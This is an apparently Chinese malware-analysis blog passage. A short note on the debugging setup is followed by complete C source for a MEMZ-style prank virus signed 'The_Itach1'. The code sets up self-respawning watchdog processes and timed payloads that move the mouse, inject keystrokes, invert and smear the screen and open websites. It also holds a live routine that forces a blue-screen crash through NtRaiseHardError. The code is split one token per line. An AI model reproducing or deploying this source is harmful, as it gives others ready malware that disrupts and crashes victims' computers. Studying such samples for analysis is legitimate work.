环境:我采用的是吾爱破解的xp系统,里面有很多现成的工具,ida,xdbg都有,只不过ida版本有点低,但是对于本病毒的分析也没太大影响,百度网盘链接:https://pan.baidu.com/s/1YvO264J-atvRUZew8AlS9g 提取码:abcd。(如果有大佬知道怎么在xp系统中使用更高版本的ida,或者有更好的分析病毒的虚拟机,可以在评论区给点资源,谢谢啦)
然后将bochsrc-sample..bxrc拖到ida分析,就可以动调了。动调还是一样的,只不过是16位汇编,分析起确实恼火,我也只能通过看反应,和看寄存器来分析个大概。
int
wide;
int
high;
HCRYPTPROV hProv;
typedef struct {
int
time;
int
(
*
func)();
}functable;
int
random1()
{
HCRYPTPROV v1;
BYTE pbBuffer[
4
]
=
{
0
};
v1
=
hProv;
if
(!hProv)
{
if
(!CryptAcquireContextW(&hProv,
0
,
0
,
1u
,
0xF0000040
))
ExitProcess(
1u
);
v1
=
hProv;
}
CryptGenRandom(v1,
4u
, pbBuffer);
return
*
(unsigned
int
*
)pbBuffer &
0x7FFFFFFF
;
}
LRESULT CALLBACK CBTProc(
int
nCode, WPARAM wParam, LPARAM lParam)
{
int
mid_wide, mid_high;
DWORD
*
cte;
if
(nCode
=
=
3
)
{
cte
=
*
(DWORD
*
*
)lParam;
if
((
*
(DWORD
*
)(
*
(DWORD
*
)lParam
+
32
) &
0x80400000
) !
=
0
)
{
mid_wide
=
random1()
%
(wide
-
cte[
5
]);
mid_high
=
random1()
%
(high
-
cte[
4
]);
cte[
7
]
=
mid_wide;
cte[
6
]
=
mid_high;
}
}
return
CallNextHookEx(
0
, nCode, wParam, lParam);
}
DWORD WINAPI StartAddress(LPVOID lpParam)
{
DWORD ThreadId;
HHOOK hook;
ThreadId
=
GetCurrentThreadId();
hook
=
SetWindowsHookExW(
5
, CBTProc,
0
, ThreadId);
MessageBoxA(
0
,
"hacked by The_Itach1"
,
"The_Itach1"
,
0x1010u
);
UnhookWindowsHookEx(hook);
return
0
;
}
void BLUE()
{
/
/
typedef void (
*
pdef_RtlAdjustPrivilege)(DWORD, DWORD, BOOLEAN, LPBYTE);
/
/
typedef void (
*
pdef_NtRaiseHardError)(DWORD, DWORD, DWORD, DWORD, DWORD, LPDWORD);
/
/
HMODULE hMod
=
NULL;
/
/
FARPROC RtlAdjustPrivilege;
/
/
FARPROC NtRaiseHardError;
/
/
unsigned char ErrKill;
/
/
long
unsigned
int
HDErr;
/
/
hMod
=
LoadLibraryA(
"ntdll"
);
/
/
RtlAdjustPrivilege
=
GetProcAddress(hMod,
"RtlAdjustPrivilege"
);
/
/
NtRaiseHardError
=
GetProcAddress(hMod,
"NtRaiseHardError"
);
/
/
pdef_RtlAdjustPrivilege NtCall
=
(pdef_RtlAdjustPrivilege)RtlAdjustPrivilege;
/
/
pdef_NtRaiseHardError NtCall2
=
(pdef_NtRaiseHardError)NtRaiseHardError;
/
/
if
(RtlAdjustPrivilege && NtRaiseHardError)
/
/
{
/
/
NtCall(
19
, TRUE, FALSE, &ErrKill);
/
/
NtCall2(
0xc0000233
,
0
,
0
,
0
,
6
, &HDErr);
/
/
}
HMODULE ntdll
=
LoadLibraryA(
"ntdll"
);
FARPROC RtlAdjPriv
=
GetProcAddress(ntdll,
"RtlAdjustPrivilege"
);
FARPROC NtRaiseHardErr
=
GetProcAddress(ntdll,
"NtRaiseHardError"
);
unsigned char ErrKill;
long
unsigned
int
HDErr;
((void(
*
)(DWORD, DWORD, BOOLEAN, LPBYTE))RtlAdjPriv)(
0x13
, true, false, &ErrKill);
((void(
*
)(DWORD, DWORD, DWORD, DWORD, DWORD, LPDWORD))NtRaiseHardErr)(
0xc0000233
,
0
,
0
,
0
,
6
, &HDErr);
}
int
shutdown()
{
int
i;
wide
=
GetSystemMetrics(
0
);
high
=
GetSystemMetrics(
1
);
for
(i
=
0
; i <
1
; i
+
+
)
{
CreateThread(
0
,
0x1000u
, StartAddress,
0
,
0
,
0
);
Sleep(
500
);
}
/
/
BLUE();
return
0
;
}
DWORD WINAPI check(LPVOID lpParam)
{
HANDLE hSnapShot
=
INVALID_HANDLE_VALUE;
PROCESSENTRY32 pe;
int
num
=
0
;
Sleep(
0x3E8u
);
while
(
1
)
{
int
pro_num
=
0
;
pe.dwSize
=
sizeof(PROCESSENTRY32);
hSnapShot
=
CreateToolhelp32Snapshot(TH32CS_SNAPALL, NULL);
Process32First(hSnapShot, &pe);
do
{
if
(!_tcsicmp(DEF_PROC_NAME, (LPCTSTR)pe.szExeFile))
{
pro_num
+
+
;
}
}
while
(Process32Next(hSnapShot, &pe));
CloseHandle(hSnapShot);
if
(pro_num < num)
{
shutdown();
}
num
=
pro_num;
}
return
0
;
}
int
func1()
{
LPCSTR website[
3
]
=
{
"https://www.baidu.com/"
,
"https://the_itach1.gitee.io/"
,
"https://cn.bing.com/"
};
ShellExecuteA(
0
,
"open"
, website[random1()
%
3
],
0
,
0
,
10
);
return
1
;
}
int
func2()
{
POINT Point;
int
x, y;
GetCursorPos(&Point);
x
=
random1()
%
wide;
y
=
random1()
%
high;
Point.x
=
x;
Point.y
=
y;
SetCursorPos(Point.x, Point.y);
return
1
;
}
int
func3()
{
INPUT
input
;
input
.
type
=
1
;
input
.ki.wVk
=
random1()
%
42
+
0x30
;
printf(
"%d"
,
input
.ki.wVk);
SendInput(INPUT_KEYBOARD, &
input
,
28
);
return
1
;
}
int
func4()
{
LPCSTR pszSound[
3
]
=
{
"SystemHand"
,
"SystemQuestion"
,
"SystemExclamation"
};
int
num
=
random1();
PlaySoundA(pszSound[num
%
3
],
0
,
1u
);
return
1
;
}
int
func5()
{
HWND desktop;
HDC winddc;
RECT rect;
desktop
=
GetDesktopWindow();
winddc
=
GetWindowDC(desktop);
GetWindowRect(desktop, &rect);
printf(
"%d %d %d %d"
, rect.top, rect.bottom, rect.left, rect.right);
BitBlt(winddc,
0
,
0
, rect.right
-
rect.left, rect.bottom
-
rect.top, winddc,
0
,
0
, NOTSRCCOPY);
ReleaseDC(desktop, winddc);
return
1
;
}
DWORD WINAPI threadptr(LPVOID lpParam)
{
DWORD ThreadId;
HHOOK hook;
ThreadId
=
GetCurrentThreadId();
hook
=
SetWindowsHookExW(
5
, CBTProc,
0
, ThreadId);
MessageBoxA(
0
,
"Still using this computer?"
,
"The_Itach1"
,
0x1010u
);
UnhookWindowsHookEx(hook);
return
0
;
}
int
func6()
{
CreateThread(
0
,
0x1000u
, threadptr,
0
,
0
,
0
);
return
1
;
}
int
func7()
{
int
icon_w, icon_h;
HWND desktop;
HDC winddc;
POINT Point;
HICON hicon1, hicon2;
icon_w
=
GetSystemMetrics(
11
)
/
2
;
icon_h
=
GetSystemMetrics(
12
)
/
2
;
printf(
"%d %d\n"
, icon_w, icon_h);
desktop
=
GetDesktopWindow();
winddc
=
GetWindowDC(desktop);
GetCursorPos(&Point);
hicon1
=
LoadIconW(
0
, IDI_ERROR);
DrawIcon(winddc, Point.x
-
icon_w, Point.y
-
icon_h, hicon1);
hicon2
=
LoadIconW(
0
, IDI_EXCLAMATION);
DrawIcon(winddc, random1()
%
wide, random1()
%
high, hicon2);
ReleaseDC(desktop, winddc);
return
1
;
}
int
func9()
{
HWND desktop;
HDC winddc;
RECT Rect;
desktop
=
GetDesktopWindow();
winddc
=
GetWindowDC(desktop);
GetWindowRect(desktop, &Rect);
StretchBlt(winddc,
50
,
50
, Rect.right
-
100
, Rect.bottom
-
100
, winddc,
0
,
0
, Rect.right, Rect.bottom, SRCCOPY);
ReleaseDC(desktop, winddc);
return
1
;
}
int
func10()
{
HWND desktop;
HDC winddc;
RECT Rect;
int
x, y, m, n, p, q;
desktop
=
GetDesktopWindow();
winddc
=
GetWindowDC(desktop);
GetWindowRect(desktop, &Rect);
x
=
random1()
%
(Rect.right
-
100
);
y
=
random1()
%
(Rect.bottom
-
100
);
m
=
random1()
%
600
;
n
=
random1()
%
600
;
p
=
random1()
%
(Rect.right
-
100
);
q
=
random1()
%
(Rect.bottom
-
100
);
BitBlt(winddc, x, y, m, n, winddc, p, q, SRCCOPY);
ReleaseDC(desktop, winddc);
return
1
;
}
DWORD WINAPI th(LPVOID lpParam)
{
int
i;
for
(i
=
0
; i <
=
30
; i
+
+
)
{
(
*
(
*
(
int
(__cdecl
*
)(void)) lpParam))();
Sleep(
1000
);
}
return
0
;
}
void fungame()
{
functable a[
9
];
int
i;
a[
0
].func
=
func1;
a[
1
].func
=
func2;
a[
2
].func
=
func3;
a[
3
].func
=
func4;
a[
4
].func
=
func5;
a[
5
].func
=
func6;
a[
6
].func
=
func7;
a[
7
].func
=
func9;
a[
8
].func
=
func10;
DWORD
*
lpParam;
for
(i
=
0
; i <
9
; i
+
+
)
{
lpParam
=
(DWORD
*
) a[i].func;
Sleep(
20000
);
CreateThread(
0
,
0
, th, lpParam,
0
,
0
);
Sleep(
100
);
}
}
LRESULT CALLBACK WndProc(
HWND hwnd,
UINT uMsg,
WPARAM wParam,
LPARAM lParam
)
{
if
(uMsg !
=
16
&& uMsg !
=
22
)
return
DefWindowProcW(hwnd, uMsg, wParam, lParam);
shutdown();
return
0
;
}
int
main()
{
int
i;
int
process_num
=
3
;
WCHAR
*
filename;
LPWSTR cmdline;
LPWSTR
*
Argv;
int
pNumArgs
=
0
;
WNDCLASSEXA wndclass;
MSG Msg;
HWND hWnd;
SHELLEXECUTEINFOW pExecInfo
=
{
0
};
wide
=
GetSystemMetrics(SM_CXFULLSCREEN);
high
=
GetSystemMetrics(SM_CYFULLSCREEN);
cmdline
=
GetCommandLineW();
Argv
=
CommandLineToArgvW(cmdline, &pNumArgs);
if
(pNumArgs >
1
)
{
if
(!lstrcmpW(Argv[
1
], L
"/watch"
))
{
CreateThread(
0
,
0
, check,
0
,
0
,
0
);
wndclass.cbSize
=
48
;
wndclass.lpszClassName
=
"The_Itach1"
;
wndclass.lpfnWndProc
=
WndProc;
wndclass.style
=
0
;
wndclass.cbClsExtra
=
0
;
wndclass.hInstance
=
0
;
wndclass.hIcon
=
0
;
wndclass.hCursor
=
0
;
wndclass.hbrBackground
=
0
;
wndclass.hIconSm
=
0
;
RegisterClassExA(&wndclass);
hWnd
=
CreateWindowExA(
0
,
"The_Itach1"
,
0
,
0
,
0
,
0
,
100
,
100
,
0
,
0
,
0
,
0
);
while
(GetMessageW(&Msg,
0
,
0
,
0
) !
=
0
)
{
TranslateMessage(&Msg);
DispatchMessageW(&Msg);
}
}
fungame();
while
(
1
)
Sleep(
0x2710u
);
}
if
(MessageBoxA(
0
,
"Are you ready to play the new game?\r\n"
"Please turn off all other processes, and then click OK.\r\n"
,
"The_Itach1"
,
0x34u
)
=
=
6
)
{
filename
=
(WCHAR
*
)LocalAlloc(
0x40u
,
0x4000u
);
GetModuleFileNameW(
0
, filename,
0x2000u
);
for
(i
=
0
; i < process_num; i
+
+
)
{
ShellExecuteW(
0
,
0
, filename, L
"/watch"
,
0
,
10
);
}
pExecInfo.cbSize
=
60
;
pExecInfo.lpFile
=
filename;
pExecInfo.lpParameters
=
L
"/main"
;
pExecInfo.fMask
=
64
;
pExecInfo.hwnd
=
0
;
pExecInfo.lpVerb
=
0
;
pExecInfo.lpDirectory
=
0
;
pExecInfo.hInstApp
=
0
;
pExecInfo.nShow
=
10
;
ShellExecuteExW(&pExecInfo);
SetPriorityClass(pExecInfo.hProcess, HIGH_PRIORITY_CLASS);
}
ExitProcess(
0
);
}